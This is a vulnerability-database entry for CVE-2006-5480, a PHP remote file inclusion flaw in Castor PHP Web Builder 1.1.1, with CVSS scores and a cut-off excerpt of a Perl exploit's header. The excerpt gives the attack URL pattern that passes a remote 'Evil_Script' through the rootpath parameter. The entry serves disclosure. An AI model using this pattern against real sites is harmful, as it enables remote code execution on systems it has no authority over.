5.1
CVSSv2

CVE-2006-5480

Published: 24/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in lib/rs.php in 2le.net Castor PHP Web Builder 1.1.1 allows remote malicious users to execute arbitrary PHP code via the rootpath parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

castor php web builder 1.1.1

Exploits

#!/usr/bin/perl # # CASTOR <= 111 Remote Command Execution Vulnerability # # Risk : High (Remote Code Execution) # # Url: svngnaorg/svn/castor/trunk # # Exploit: # wwwsitecom/[path]/lib/rsphp?rootpath=[Evil_Script] # # (c)oded and f0und3d by Kw3[R]Ln <ciriboflacs[AT]YaHOocom> # # Romanian Security Team : hTTp://RST- ...